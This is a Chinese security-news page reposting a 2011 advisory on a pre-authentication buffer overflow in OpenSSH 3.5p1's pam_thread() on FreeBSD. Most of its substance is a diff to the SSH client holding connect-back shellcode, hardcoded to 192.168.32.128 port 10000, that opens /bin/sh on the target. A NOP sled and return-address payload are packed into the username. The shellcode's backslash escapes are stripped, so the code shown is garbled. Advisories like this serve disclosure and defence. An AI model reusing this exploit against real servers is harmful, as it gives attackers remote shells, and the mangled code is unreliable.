首页 / 操作系统 / Linux / OpenSSH “pam_thread（）”远程缓冲区溢出漏洞

发布日期：2011-06-30
更新日期：2011-06-30受影响系统：
OpenSSH OpenSSH 3.5 p1
描述：
--------------------------------------------------------------------------------
BUGTRAQ  ID: 48507OpenSSH（Open Secure Shell）是使用SSH通过计算机网络加密通信的实现。OpenSSH在pam_thread（）的实现上存在远程缓冲区溢出漏洞，远程攻击者可利用此漏洞执行任意代码。<*来源：Kingcope （kingcope@gmx.net）
 
  链接：http://packetstormsecurity.org/files/view/102683/ssh_preauth_freebsd.txt
*>测试方法：
--------------------------------------------------------------------------------警 告以下程序（方法）可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！root@debian:~# diff openssh-5.8p2/sshconnect1.c openssh-5.8p2_2/sshconnect1.c
667a668,717
// Connect Back Shellcode#define IPADDR "xc0xa8x20x80"
#define PORT "x27x10" /* htons（10000） */char sc[] =
"x90x90"
"x90x90"
"x31xc9" // xor ecx, ecx
"xf7xe1" // mul ecx
"x51" // push ecx
"x41" // inc ecx
"x51" // push ecx
"x41" // inc ecx
"x51" // push ecx
"x51" // push ecx
"xb0x61" // mov al, 97
"xcdx80" // int 80h
"x89xc3" // mov ebx, eax
"x68"IPADDR // push dword 0101017fh
"x66x68"PORT // push word 4135
"x66x51" // push cx
"x89xe6" // mov esi, esp
"xb2x10" // mov dl, 16
"x52" // push edx
"x56" // push esi
"x50" // push eax
"x50" // push eax
"xb0x62" // mov al, 98
"xcdx80" // int 80h
"x41" // inc ecx
"xb0x5a" // mov al, 90
"x49" // dec ecx
"x51" // push ecx
"x53" // push ebx
"x53" // push ebx
"xcdx80" // int 80h
"x41" // inc ecx
"xe2xf5" // loop -10
"x51" // push ecx
"x68x2fx2fx73x68" // push dword 68732f2fh
"x68x2fx62x69x6e" // push dword 6e69622fh
"x89xe3" // mov ebx, esp
"x51" // push ecx
"x54" // push esp
"x53" // push ebx
"x53" // push ebx
"xb0xc4x34xff"
"xcdx80"; // int 80h679a730,737
char buffer[8096];// Offset is for FreeBSD-4.11 RELEASE OpenSSH 3.5p1
memcpy（buffer, "AAAAx58xd8x07x08""CCCCDDDDEEEExd8xd8x07x08""GGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOO", 24）;
memset（buffer+24, "x90", 5000）;
memcpy（buffer+24+5000, sc, sizeof（sc））;
server_user=buffer;建议：
--------------------------------------------------------------------------------
厂商补丁：OpenSSH
-------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：http://www.openssh.com/Sybase Advantage Server “ADS”进程内存破坏漏洞IBM Tivoli Storage Manager Client两个权限提升漏洞相关资讯      OpenSSH 

OpenSSH服务器端的配置文件各常用  （12/04/2015 14:31:39） OpenSSH PAM代码多个远程代码执行  （08/31/2015 18:02:05） OpenSSH 7.1 发布下载，bug 修复版  （08/22/2015 07:48:42）

微软发布 Windows 版 OpenSSH 源码  （10/20/2015 14:01:19） Linux下远程连接SSH和OpenSSH应用  （08/22/2015 13:18:47） 平滑升级OpenSSH版本方法  （08/20/2015 20:28:01）

本文评论 查看全部评论 （0）

表情： 姓名： 匿名字数 同意评论声明 发表 评论声明 尊重网上道德，遵守中华人民共和国的各项有关法律法规 承担一切因您的行为而直接或间接导致的民事或刑事法律责任 本站管理人员有权保留或删除其管辖留言中的任意内容 本站有权在网站内转载或引用您的评论 参与本评论即 收藏该网址 版权所有©石家庄振强科技有限公司2024 冀ICP备08103738号-5 网站地图